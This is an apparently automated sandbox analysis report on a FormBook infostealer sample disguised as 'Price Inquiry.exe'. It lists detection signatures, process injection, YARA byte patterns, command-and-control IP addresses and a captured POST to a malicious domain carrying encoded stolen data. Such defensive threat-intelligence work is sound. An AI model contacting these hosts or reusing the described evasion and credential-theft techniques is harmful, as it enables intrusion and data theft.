Edit tour

Windows Analysis Report
Price Inquiry.exe

Overview

General Information

Sample name:	Price Inquiry.exe
Analysis ID:	1534143
MD5:	e54162509760c0e8081c8157ec2e8198
SHA1:	87ec04f9de3f20b19e2335852b9ad21355d3a300
SHA256:	a6e3235b896751de88268e16897a971fb6f68c06c63566714fbc70a5f78d4fda
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Price Inquiry.exe (PID: 4568 cmdline: "C:\Users\user\Desktop\Price Inquiry.exe" MD5: E54162509760C0E8081C8157EC2E8198)

Price Inquiry.exe (PID: 4364 cmdline: "C:\Users\user\Desktop\Price Inquiry.exe" MD5: E54162509760C0E8081C8157EC2E8198)

Price Inquiry.exe (PID: 2912 cmdline: "C:\Users\user\Desktop\Price Inquiry.exe" MD5: E54162509760C0E8081C8157EC2E8198)

pfyyryeDyx.exe (PID: 2264 cmdline: "C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

tzutil.exe (PID: 1136 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)

pfyyryeDyx.exe (PID: 3840 cmdline: "C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6128 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f1a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17382:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4a8670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x49084f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4a8670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x49084f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: Price Inquiry.exe PID: 4568	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Price Inquiry.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.Price Inquiry.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e3a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16582:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.Price Inquiry.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.Price Inquiry.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f1a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17382:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-15T16:19:17.251670+0200	2855465	1	A Network Trojan was detected	192.168.2.6	49900	194.58.112.174	80	TCP
2024-10-15T16:19:40.922570+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53114	199.59.243.227	80	TCP
2024-10-15T16:20:11.695720+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53120	119.28.49.194	80	TCP
2024-10-15T16:20:25.321453+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53125	96.126.123.244	80	TCP
2024-10-15T16:20:39.869098+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53129	103.144.219.16	80	TCP
2024-10-15T16:20:54.415505+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53133	84.32.84.32	80	TCP
2024-10-15T16:21:08.165031+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53138	47.57.185.227	80	TCP
2024-10-15T16:21:30.560753+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53142	162.0.213.94	80	TCP
2024-10-15T16:22:44.492301+0200	2855465	1	A Network Trojan was detected	192.168.2.6	53146	85.159.66.93	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-15T16:19:33.440899+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53104	199.59.243.227	80	TCP
2024-10-15T16:19:35.836739+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53112	199.59.243.227	80	TCP
2024-10-15T16:19:38.388556+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53113	199.59.243.227	80	TCP
2024-10-15T16:19:56.883283+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53117	119.28.49.194	80	TCP
2024-10-15T16:19:59.633181+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53118	119.28.49.194	80	TCP
2024-10-15T16:20:02.180365+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53119	119.28.49.194	80	TCP
2024-10-15T16:20:17.680674+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53122	96.126.123.244	80	TCP
2024-10-15T16:20:20.258107+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53123	96.126.123.244	80	TCP
2024-10-15T16:20:22.799770+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53124	96.126.123.244	80	TCP
2024-10-15T16:20:32.133197+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53126	103.144.219.16	80	TCP
2024-10-15T16:20:34.758111+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53127	103.144.219.16	80	TCP
2024-10-15T16:20:37.369164+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53128	103.144.219.16	80	TCP
2024-10-15T16:20:46.675779+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53130	84.32.84.32	80	TCP
2024-10-15T16:20:49.284079+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53131	84.32.84.32	80	TCP
2024-10-15T16:20:51.755532+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53132	84.32.84.32	80	TCP
2024-10-15T16:21:00.850643+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53134	47.57.185.227	80	TCP
2024-10-15T16:21:03.087126+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53135	47.57.185.227	80	TCP
2024-10-15T16:21:05.664273+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53136	47.57.185.227	80	TCP
2024-10-15T16:21:22.906276+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53139	162.0.213.94	80	TCP
2024-10-15T16:21:25.432301+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53140	162.0.213.94	80	TCP
2024-10-15T16:21:28.053692+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53141	162.0.213.94	80	TCP
2024-10-15T16:21:37.339322+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53143	85.159.66.93	80	TCP
2024-10-15T16:21:39.885023+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53144	85.159.66.93	80	TCP
2024-10-15T16:21:42.431529+0200	2855464	1	A Network Trojan was detected	192.168.2.6	53145	85.159.66.93	80	TCP

HTTP traffic detected: POST /slxf/ HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.personal-loans-jp8.xyzContent-Length: 208Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.personal-loans-jp8.xyz/slxf/User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18Data Raw: 4b 32 39 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 4b 6e 67 41 38 58 59 33 4f 2f 41 61 71 78 70 4f 6f 6d 4c 50 43 6c 44 4d 45 2b 56 78 74 67 45 31 62 66 41 42 54 72 73 4d 69 6b 6d 79 50 6c 73 31 48 43 38 6c 63 34 30 35 74 67 2b 31 34 54 51 39 6c 2b 39 48 44 4a 33 4c 41 59 39 6f 5a 74 51 63 79 2f 7a 38 79 64 59 58 2f 64 4e 50 4f 6b 49 42 38 70 6e 68 45 67 61 43 6d 34 65 6f 48 56 4e 78 59 72 75 51 6a 54 6e 71 48 61 4f 57 33 59 30 56 6b 4c 37 57 70 41 7a 54 45 70 2b 79 6a 42 55 52 39 47 65 34 69 48 63 57 68 47 6f 62 4c 56 57 66 32 6b 38 6c 37 30 57 6a 4a 37 78 6e 45 30 5a 79 34 47 68 6e 42 4e 44 2b 52 4a 52 79 34 70 67 Data Ascii: K29=BZfl/Hh07lNLQKngA8XY3O/AaqxpOomLPClDME+VxtgE1bfABTrsMikmyPls1HC8lc405tg+14TQ9l+9HDJ3LAY9oZtQcy/z8ydYX/dNPOkIB8pnhEgaCm4eoHVNxYruQjTnqHaOW3Y0VkL7WpAzTEp+yjBUR9Ge4iHcWhGobLVWf2k8l70WjJ7xnE0Zy4GhnBND+RJRy4pg

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:19:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 72 65 64 69 6d 70 61 63 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:20:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:20:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:20:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:20:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:21:00 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:21:00 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:21:02 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:21:05 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 14:21:07 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
